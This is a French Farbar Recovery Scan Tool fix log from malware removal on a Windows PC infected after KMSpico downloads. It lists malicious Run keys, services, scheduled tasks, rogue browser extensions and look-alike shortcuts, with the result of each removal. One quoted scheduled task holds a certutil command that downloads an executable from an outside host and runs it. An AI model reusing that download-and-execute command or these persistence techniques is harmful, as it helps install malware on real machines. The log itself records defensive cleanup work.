Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 01.08.2018
Exécuté par Bedson (02-08-2018 12:08:01) Run:2
Exécuté depuis C:\Users\samy\Desktop
Profils chargés: Bedson (Profils disponibles: Bedson)
Mode d'amorçage: Safe Mode (with Networking)
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
HKLM\...\RunOnce: [m0sjmpauhcm] => C:\Program Files (x86)\Mtarfeg\527300.exe [664576 2018-07-31] ()
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [FrostyMeadow] => C:\Windows\rss\csrss.exe [3130880 2018-07-31] ()
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [3L3TQNOHFTYB1TK] => C:\Program Files\D8Z767CNZQ\D8Z767CNZ.exe [765440 2018-07-31] (5M)
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [0MZH1X3GIPFONGA] => C:\Program Files\UYTRHLYFZK\UYTRHLYFZ.exe [765440 2018-07-31] (5M)
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [GNO8RGM4YFQRYBT] => C:\Program Files\36FTPOG8H2\36FTPOG8H.exe [866304 2018-07-31] (8FF85Z50O)
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [6945432] => C:\Users\samy\AppData\Roaming\zwctqzd3kmu\zaaord54lyf.exe [657326 2018-07-31] ( )
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [GRQLYKIVUKI5DKW] => C:\Program Files\FQX4IG9L3U\FQX4IG9L3.exe [844800 2018-07-31] (EBK4Y0TV)
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [CloudNet] => C:\Users\samy\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2018-08-01] (EpicNet Inc.)
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [2180190] => C:\Users\samy\AppData\Roaming\r5o2hcpj3mc\kznfmamiyee.exe [657326 2018-07-31] ( )
HKU\S-1-5-21-908308729-834498892-2167088775-1001\...\Run: [LookupPro] => C:\Users\samy\AppData\Roaming\LookupPro\python\pythonw.exe [95904 2018-05-02] (Python Software Foundation)
GroupPolicy: Restriction - Chrome
CHR HKLM\SOFTWARE\Policies\Google: Restriction
HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL73pVoaOVYBShtFCiyYFXOEi3DYpyRk4Yfi8UudqMXONcwtFNIdBh9QqvbH7whHpssyIprUYvC_edvljo8dkf99UBZMmoyBz5xay1cWoH6jGV0fT1vWudkl0vrQRHVIv_rHY6uL1pfzEc1Ob2WMGeYfXQiuGdKtAktGcJmfJrMhMbHcxDfpA,,&q={searchTerms}
HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL73pVoaOVYBShtFCiyYFXOEi3DYpyRk4Yfi8UudqMXONcwtFNIdBh9QqvbH7whHpssyIprUYvC_edvljo8dkf99UBV3woEJnuJhhLXfJVv5Dnr2EfzqkH-d3FOhfwLyATsthFAT69sZ4Y13l3SlCtdvQgwBO7KW9-AiuSiCbffEHupiqNCog,,
BHO: YoutubeAdBlock -> {BAA31A35-DDC9-488F-864E-7FF705D4DDBD} -> C:\Program Files (x86)\zDUkwTwaYIE\tAi5BR0J.dll [2018-07-31] ()
BHO-x32: YoutubeAdBlock -> {BAA31A35-DDC9-488F-864E-7FF705D4DDBD} -> C:\Program Files (x86)\zDUkwTwaYIE\kBy8vJ5.dll [2018-07-31] ()
FF NewTab: Mozilla\Firefox\Profiles\d40v0xzh.default -> file:///C:/ProgramData/Pitachoks/ff.NT
FF Extension: (Pas de nom) - C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-07-31] [non signé]
FF HKLM\...\Firefox\Extensions: [{dd68e504-9d4e-4346-9158-887b1be9b96e}] - C:\Windows\fox\momentumlitetab-1.0.0.3-an+fx.xpi
FF Extension: (MomentumLiteTab) - C:\Windows\fox\momentumlitetab-1.0.0.3-an+fx.xpi [2018-08-01]
FF HKLM-x32\...\Firefox\Extensions: [{dd68e504-9d4e-4346-9158-887b1be9b96e}] - C:\Windows\fox\momentumlitetab-1.0.0.3-an+fx.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-08-01]
C:\Users\samy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjigjjillnilojhbaojacalmfjboejk
C:\Users\samy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha
CHR HKLM\...\Chrome\Extension: [cognmciomgbkakkddljnmdlekcnngpee] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cognmciomgbkakkddljnmdlekcnngpee] - hxxps://clients2.google.com/service/update2/crx
R2 MzE5ZjFm; C:\Program Files\MzE5ZjFm\YTQ5ZjA0ZGJhNjR.exe [888816 2018-07-31] ()
R2 WinDefender; C:\Windows\windefender.exe [0 ] ()
R2 MzM0NzRh; rundll32.exe C:\Windows\rncjphpnqaffgodn.rncjh BGzIvbOQETcu [X]
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zéro octet Fichier/Dossier)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2018-07-31] () [Fichier non signé]
R1 ZmNlMjZmNDVmOGViNDAy; C:\Windows\System32\drivers\ZmNlMjZmNDVmOGViNDAy.sys [216760 2018-07-30] ()
S2 KMSEmulator; "C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP [X]
U5 iTranslatorSvc; <==== ATTENTION: Service verrouillé
R4 NetfilterSvc; \??\C:\Windows\iNetfilterSvc [X]
S1 powzip; \SystemRoot\System32\drivers\powzip.sys [X]
S3 WinDivert1.1; \??\C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.sys [X]
2018-07-31 23:44 - 2018-08-01 07:10 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-07-31 23:44 - 2018-07-31 23:44 - 001963520 _____ C:\Windows\rncjphpnqaffgodn.rncjh
2018-07-31 23:44 - 2018-07-31 23:44 - 000003482 _____ C:\Windows\System32\Tasks\LookupPro
2018-07-31 23:44 - 2018-07-31 23:44 - 000000000 ____D C:\Users\samy\AppData\Roaming\LookupPro
2018-07-31 23:44 - 2018-07-31 23:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-07-31 23:44 - 2018-07-31 23:44 - 000000000 ____D C:\Program Files (x86)\Lookup Pro
2018-07-31 23:43 - 2018-07-31 23:43 - 000000000 ____D C:\Users\samy\AppData\Roaming\r5o2hcpj3mc
2018-07-31 23:15 - 2018-07-31 23:15 - 000000000 ____D C:\Users\samy\AppData\Roaming\EpicNet Inc
2018-07-31 22:52 - 2018-07-31 22:52 - 000000000 ____D C:\Users\samy\AppData\Roaming\zwctqzd3kmu
2018-07-31 22:52 - 2018-07-31 22:52 - 000000000 ____D C:\Program Files\FQX4IG9L3U
2018-07-31 22:07 - 2018-07-31 23:06 - 000000000 ____D C:\Users\samy\AppData\Roaming\zevc1nsrd1b
2018-07-31 22:07 - 2018-07-31 22:07 - 000000000 ____D C:\Program Files\36FTPOG8H2
2018-07-31 21:22 - 2018-07-31 22:52 - 000003516 _____ C:\Windows\System32\Tasks\CastVPN
2018-07-31 21:22 - 2018-07-31 21:23 - 000000000 ____D C:\Program Files\MzE5ZjFm
2018-07-31 21:22 - 2018-07-31 21:22 - 000000000 ____D C:\Users\samy\AppData\Roaming\hfheupm15qe
2018-07-31 21:22 - 2018-07-31 21:22 - 000000000 ____D C:\Program Files\UYTRHLYFZK
2018-07-31 20:37 - 2018-07-31 23:07 - 000000000 ____D C:\Users\samy\AppData\Roaming\e2fdtvdgbep
2018-07-31 20:36 - 2018-07-31 20:37 - 000000000 ____D C:\Program Files\D8Z767CNZQ
2018-07-31 19:52 - 2018-07-31 23:07 - 000000000 ____D C:\Users\samy\AppData\Roaming\2gjunaemefd
2018-07-31 19:51 - 2018-07-31 19:52 - 000000000 ____D C:\Program Files\9RZW1SWTQW
2018-07-31 18:47 - 2018-07-31 19:15 - 000000000 ____D C:\Users\samy\AppData\Roaming\sfexv4pwvfh
2018-07-31 18:47 - 2018-07-31 19:06 - 000000000 ____D C:\Program Files\271TCF20SD
2018-07-31 18:47 - 2018-07-31 18:47 - 000000000 _____ C:\Program Files\a.exe
2018-07-31 18:15 - 2018-07-31 18:15 - 001254312 _____ C:\Users\samy\Downloads\kmspico_v10_1_8_setup.exe
2018-07-31 17:47 - 2018-07-31 17:47 - 004547801 _____ C:\Users\samy\Downloads\KMSpico.v10.2.0.FINAL_-_Portable.zip
2018-07-31 18:23 - 2018-08-01 01:15 - 000003274 _____ C:\Windows\System32\Tasks\csrss
2018-07-31 18:23 - 2018-07-31 23:07 - 000309248 _____ C:\Windows\system32\iTranslator.dll
2018-07-31 18:23 - 2018-07-31 18:24 - 000000000 ____D C:\Program Files (x86)\LDRIRJvSptwQC
2018-07-31 18:23 - 2018-07-31 18:23 - 007766016 _____ C:\Users\samy\AppData\Local\agent.dat
2018-07-31 18:23 - 2018-07-31 18:23 - 002018283 _____ C:\Users\samy\AppData\Local\Ran-Zap.tst
2018-07-31 18:23 - 2018-07-31 18:23 - 000744968 _____ C:\Windows\iTranslator
2018-07-31 18:23 - 2018-07-31 18:23 - 000126464 _____ C:\Users\samy\AppData\Local\noah.dat
2018-07-31 18:23 - 2018-07-31 18:23 - 000070896 _____ C:\Users\samy\AppData\Local\Config.xml
2018-07-31 18:23 - 2018-07-31 18:23 - 000005568 _____ C:\Users\samy\AppData\Local\md.xml
2018-07-31 18:23 - 2018-07-31 18:23 - 000003212 _____ C:\Windows\System32\Tasks\zleDohIUJuBRcb
2018-07-31 18:23 - 2018-07-31 18:23 - 000003044 _____ C:\Windows\System32\Tasks\reQGtPgibmNDB2
2018-07-31 18:23 - 2018-07-31 18:23 - 000003034 _____ C:\Windows\System32\Tasks\vnKUActWDSalGNfrR2
2018-07-31 18:23 - 2018-07-31 18:23 - 000003026 _____ C:\Windows\System32\Tasks\WAOtgPBGflHZLCaeTGs2
2018-07-31 18:23 - 2018-07-31 18:23 - 000003008 _____ C:\Windows\System32\Tasks\cvyVeCGCBGMaCol2
2018-07-31 18:23 - 2018-07-31 18:23 - 000002984 _____ C:\Windows\System32\Tasks\Chameleon Folder-Bedson
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Windows\SSL
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Windows\nss
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Windows\fox
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\ProgramData\itranslator
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\ProgramData\bzLvYYFFZmFknGVB
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\zDUkwTwaYIE
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\xpZXRwYFlIWU2
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\VHbWajSWU
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\IBeJrDHLZIUn
2018-07-31 18:23 - 2018-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\ELCdlNcAzQmJaXxTcwR
2018-07-31 18:21 - 2018-07-31 19:15 - 000000000 ____D C:\Users\samy\AppData\Roaming\qv1a3x2d2dm
2018-07-31 18:21 - 2018-07-31 19:06 - 000000000 ____D C:\Program Files\SR1OVYZ075
2018-07-31 18:23 - 2018-07-31 18:23 - 007766016 _____ () C:\Users\samy\AppData\Local\agent.dat
2018-07-31 18:23 - 2018-07-31 18:23 - 000070896 _____ () C:\Users\samy\AppData\Local\Config.xml
2018-07-31 18:20 - 2018-07-31 18:20 - 000140800 _____ () C:\Users\samy\AppData\Local\installer.dat
2018-07-31 18:23 - 2018-07-31 18:23 - 000005568 _____ () C:\Users\samy\AppData\Local\md.xml
2018-07-31 18:23 - 2018-07-31 18:23 - 000126464 _____ () C:\Users\samy\AppData\Local\noah.dat
2018-07-31 18:21 - 2018-07-31 18:21 - 000278508 _____ () C:\Users\samy\AppData\Local\PlusCof.bin
2018-07-31 18:23 - 2018-07-31 18:20 - 002294272 _____ (TODO: <Company name>) C:\Users\samy\AppData\Local\Ran-Zap.exe
2018-07-31 18:23 - 2018-07-31 18:23 - 002018283 _____ () C:\Users\samy\AppData\Local\Ran-Zap.tst
2018-07-31 18:20 - 2018-07-31 18:51 - 001413120 _____ () C:\Users\samy\AppData\Local\sham.db
2018-07-31 18:25 - 2018-07-31 18:25 - 000032038 _____ () C:\Users\samy\AppData\Local\uninstall_temp.ico
2018-07-31 18:24 - 2018-07-31 18:24 - 001895384 _____ () C:\Users\samy\AppData\Local\Vivastring.bin
C:\Program Files (x86)\Mtarfeg
C:\Users\samy\AppData\Roaming\Browsers
C:\Windows\rss
C:\Windows\windefender.exe
Task: {06E544A7-875F-4D45-8217-F7CEE06BD291} - System32\Tasks\zleDohIUJuBRcb => rundll32 "C:\Program Files (x86)\xpZXRwYFlIWU2\ckLDSALuAYfcw.dll",#1
Task: {1E029591-9CB5-4A7E-BF1E-6C3A1883B3AE} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-07-31] ()
Task: {257B4580-A453-4A80-9692-48770A8E557A} - System32\Tasks\reQGtPgibmNDB2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\bzLvYYFFZmFknGVB\CZPQRNL.wsf"
Task: {5BC9C638-C77A-45FD-8C48-5E256F4EC9DD} - System32\Tasks\vnKUActWDSalGNfrR2 => rundll32 "C:\Program Files (x86)\ELCdlNcAzQmJaXxTcwR\uKqTOkF.dll",#1
Task: {8B42235A-108E-4ACA-9E97-433835655799} - System32\Tasks\WAOtgPBGflHZLCaeTGs2 => rundll32 "C:\Program Files (x86)\LDRIRJvSptwQC\wzaufMC.dll",#1
Task: {A2902D70-1092-4EE7-8A75-2E887ADA18BF} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\Bedson\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Bedson\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {CE6C29DB-B07A-4EBA-BA79-CBFD1FFEE851} - System32\Tasks\LookupPro => C:\Users\samy\AppData\Roaming\LookupPro\python\pythonw.exe [2018-05-02] (Python Software Foundation)
Task: {F77B0082-9C92-4B87-AA72-632163F4ADBA} - System32\Tasks\cvyVeCGCBGMaCol2 => rundll32 "C:\Program Files (x86)\VHbWajSWU\kDAuYc.dll",#1
Shortcut: C:\Users\samy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Eхplоrеr.lnk -> C:\Users\samy\AppData\Roaming\Browsers\exe.erolpxei.bat (Pas de fichier) <==== Cyrillic
Shortcut: C:\Users\samy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhromе.lnk -> C:\Users\samy\AppData\Roaming\Browsers\exe.emorhc.bat (Pas de fichier) <==== Cyrillic
Shortcut: C:\Users\samy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Мozilla Firеfoх.lnk -> C:\Users\samy\AppData\Roaming\Browsers\exe.xoferif.bat (Pas de fichier) <==== Cyrillic
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firеfох.lnk -> C:\Users\samy\AppData\Roaming\Browsers\exe.xoferif.bat (Pas de fichier) <==== Cyrillic
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gооgle Сhrоme.lnk -> C:\Users\samy\AppData\Roaming\Browsers\exe.emorhc.bat (Pas de fichier) <==== Cyrillic
Shortcut: C:\Users\Public\Desktop\Firеfox.lnk -> C:\Users\samy\AppData\Roaming\Browsers\exe.xoferif.bat (Pas de fichier) <==== Cyrillic
Shortcut: C:\Users\Public\Desktop\Gоogle Chrоme.lnk -> C:\Users\samy\AppData\Roaming\Browsers\exe.emorhc.bat (Pas de fichier) <==== Cyrillic
ShortcutWithArgument: C:\Users\samy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Classes\regfile: regedit.exe "%1"
FirewallRules: [{D099E827-AEBF-4628-B0A9-FA0D3E833BF1}] => (Allow) C:\WINDOWS\rss\csrss.exe
FirewallRules: [{7EAF4AFD-4181-4665-8758-EE59B9E1DDBF}] => (Allow) C:\Users\Bedson\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{3FE0B220-1FD6-4145-B0B3-362CB62E7E36}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{969AE61B-22A7-4853-8C84-AC1B73ECB908}] => (Allow) C:\Users\Bedson\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
EmptyTemp:

*****************

Erreur: Un point de restauration ne peut être créé qu'en mode normal.
Processus fermé avec succès.
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\m0sjmpauhcm" => non trouvé(e)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => impossible à supprimer, clé était peut-être protégé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\FrostyMeadow" => supprimé(es) avec succès
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\3L3TQNOHFTYB1TK" => non trouvé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\0MZH1X3GIPFONGA" => non trouvé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GNO8RGM4YFQRYBT" => non trouvé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\6945432" => non trouvé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GRQLYKIVUKI5DKW" => non trouvé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\2180190" => non trouvé(e)
"HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Windows\CurrentVersion\Run\\LookupPro" => non trouvé(e)
C:\Windows\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
"HKLM\SOFTWARE\Policies\Google" => supprimé(es) avec succès
HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKU\S-1-5-21-908308729-834498892-2167088775-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BAA31A35-DDC9-488F-864E-7FF705D4DDBD} => non trouvé(e)
HKLM\Software\Classes\CLSID\{BAA31A35-DDC9-488F-864E-7FF705D4DDBD} => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BAA31A35-DDC9-488F-864E-7FF705D4DDBD} => non trouvé(e)
HKLM\Software\Wow6432Node\Classes\CLSID\{BAA31A35-DDC9-488F-864E-7FF705D4DDBD} => non trouvé(e)
"FF NewTab: Mozilla\Firefox\Profiles\d40v0xzh.default -> file:///C:/ProgramData/Pitachoks/ff.NT" => non trouvé(e)
"C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi" => non trouvé(e)
"HKLM\Software\Mozilla\Firefox\Extensions\\{dd68e504-9d4e-4346-9158-887b1be9b96e}" => supprimé(es) avec succès
C:\Windows\fox\momentumlitetab-1.0.0.3-an+fx.xpi => déplacé(es) avec succès
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{dd68e504-9d4e-4346-9158-887b1be9b96e}" => supprimé(es) avec succès
"C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js" => non trouvé(e)
"C:\Users\samy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjigjjillnilojhbaojacalmfjboejk" => non trouvé(e)
"C:\Users\samy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha" => non trouvé(e)
"HKLM\SOFTWARE\Google\Chrome\Extensions\cognmciomgbkakkddljnmdlekcnngpee" => supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\cognmciomgbkakkddljnmdlekcnngpee" => supprimé(es) avec succès
MzE5ZjFm => service non trouvé(e).
"HKLM\System\CurrentControlSet\Services\WinDefender" => supprimé(es) avec succès
WinDefender => service supprimé(es) avec succès
MzM0NzRh => service non trouvé(e).
"HKLM\System\CurrentControlSet\Services\Winmon" => supprimé(es) avec succès
Winmon => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\WinmonFS" => supprimé(es) avec succès
WinmonFS => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor" => supprimé(es) avec succès
WinmonProcessMonitor => service supprimé(es) avec succès
ZmNlMjZmNDVmOGViNDAy => Impossible d'arrêter le service.
"HKLM\System\CurrentControlSet\Services\ZmNlMjZmNDVmOGViNDAy" => supprimé(es) avec succès
ZmNlMjZmNDVmOGViNDAy => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\KMSEmulator" => supprimé(es) avec succès
KMSEmulator => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\iTranslatorSvc" => supprimé(es) avec succès
iTranslatorSvc => service supprimé(es) avec succès
NetfilterSvc => service non trouvé(e).
"HKLM\System\CurrentControlSet\Services\powzip" => supprimé(es) avec succès
powzip => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\WinDivert1.1" => supprimé(es) avec succès
WinDivert1.1 => service supprimé(es) avec succès
C:\Windows\SysWOW64\SSL => déplacé(es) avec succès
"C:\Windows\rncjphpnqaffgodn.rncjh" => non trouvé(e)
C:\Windows\System32\Tasks\LookupPro => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\LookupPro => déplacé(es) avec succès
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro => déplacé(es) avec succès
C:\Program Files (x86)\Lookup Pro => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\r5o2hcpj3mc => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\EpicNet Inc => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\zwctqzd3kmu => déplacé(es) avec succès
C:\Program Files\FQX4IG9L3U => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\zevc1nsrd1b => déplacé(es) avec succès
C:\Program Files\36FTPOG8H2 => déplacé(es) avec succès
C:\Windows\System32\Tasks\CastVPN => déplacé(es) avec succès
C:\Program Files\MzE5ZjFm => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\hfheupm15qe => déplacé(es) avec succès
C:\Program Files\UYTRHLYFZK => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\e2fdtvdgbep => déplacé(es) avec succès
C:\Program Files\D8Z767CNZQ => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\2gjunaemefd => déplacé(es) avec succès
C:\Program Files\9RZW1SWTQW => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\sfexv4pwvfh => déplacé(es) avec succès
C:\Program Files\271TCF20SD => déplacé(es) avec succès
C:\Program Files\a.exe => déplacé(es) avec succès
C:\Users\samy\Downloads\kmspico_v10_1_8_setup.exe => déplacé(es) avec succès
C:\Users\samy\Downloads\KMSpico.v10.2.0.FINAL_-_Portable.zip => déplacé(es) avec succès
C:\Windows\System32\Tasks\csrss => déplacé(es) avec succès
C:\Windows\system32\iTranslator.dll => déplacé(es) avec succès
C:\Program Files (x86)\LDRIRJvSptwQC => déplacé(es) avec succès
C:\Users\samy\AppData\Local\agent.dat => déplacé(es) avec succès
C:\Users\samy\AppData\Local\Ran-Zap.tst => déplacé(es) avec succès
C:\Windows\iTranslator => déplacé(es) avec succès
C:\Users\samy\AppData\Local\noah.dat => déplacé(es) avec succès
C:\Users\samy\AppData\Local\Config.xml => déplacé(es) avec succès
C:\Users\samy\AppData\Local\md.xml => déplacé(es) avec succès
C:\Windows\System32\Tasks\zleDohIUJuBRcb => déplacé(es) avec succès
C:\Windows\System32\Tasks\reQGtPgibmNDB2 => déplacé(es) avec succès
C:\Windows\System32\Tasks\vnKUActWDSalGNfrR2 => déplacé(es) avec succès
C:\Windows\System32\Tasks\WAOtgPBGflHZLCaeTGs2 => déplacé(es) avec succès
C:\Windows\System32\Tasks\cvyVeCGCBGMaCol2 => déplacé(es) avec succès
C:\Windows\System32\Tasks\Chameleon Folder-Bedson => déplacé(es) avec succès
C:\Windows\SSL => déplacé(es) avec succès
C:\Windows\nss => déplacé(es) avec succès
C:\Windows\fox => déplacé(es) avec succès
C:\ProgramData\itranslator => déplacé(es) avec succès
C:\ProgramData\bzLvYYFFZmFknGVB => déplacé(es) avec succès
C:\Program Files (x86)\zDUkwTwaYIE => déplacé(es) avec succès
C:\Program Files (x86)\xpZXRwYFlIWU2 => déplacé(es) avec succès
C:\Program Files (x86)\VHbWajSWU => déplacé(es) avec succès
C:\Program Files (x86)\IBeJrDHLZIUn => déplacé(es) avec succès
C:\Program Files (x86)\ELCdlNcAzQmJaXxTcwR => déplacé(es) avec succès
C:\Users\samy\AppData\Roaming\qv1a3x2d2dm => déplacé(es) avec succès
C:\Program Files\SR1OVYZ075 => déplacé(es) avec succès
"C:\Users\samy\AppData\Local\agent.dat" => non trouvé(e)
"C:\Users\samy\AppData\Local\Config.xml" => non trouvé(e)
C:\Users\samy\AppData\Local\installer.dat => déplacé(es) avec succès
"C:\Users\samy\AppData\Local\md.xml" => non trouvé(e)
"C:\Users\samy\AppData\Local\noah.dat" => non trouvé(e)
C:\Users\samy\AppData\Local\PlusCof.bin => déplacé(es) avec succès
C:\Users\samy\AppData\Local\Ran-Zap.exe => déplacé(es) avec succès
"C:\Users\samy\AppData\Local\Ran-Zap.tst" => non trouvé(e)
C:\Users\samy\AppData\Local\sham.db => déplacé(es) avec succès
C:\Users\samy\AppData\Local\uninstall_temp.ico => déplacé(es) avec succès
C:\Users\samy\AppData\Local\Vivastring.bin => déplacé(es) avec succès
C:\Program Files (x86)\Mtarfeg => déplacé(es) avec succès
"C:\Users\samy\AppData\Roaming\Browsers" => non trouvé(e)
C:\Windows\rss => déplacé(es) avec succès
Impossible de déplacer "C:\Windows\windefender.exe" => Planifié pour déplacement au redémarrage.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{06E544A7-875F-4D45-8217-F7CEE06BD291} => non trouvé(e)
"C:\Windows\System32\Tasks\zleDohIUJuBRcb" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\zleDohIUJuBRcb => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1E029591-9CB5-4A7E-BF1E-6C3A1883B3AE} => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E029591-9CB5-4A7E-BF1E-6C3A1883B3AE} => impossible à supprimer. Accès refusé.
"C:\Windows\System32\Tasks\csrss" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss => impossible à supprimer. Accès refusé.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{257B4580-A453-4A80-9692-48770A8E557A} => non trouvé(e)
"C:\Windows\System32\Tasks\reQGtPgibmNDB2" => non trouvé(e)
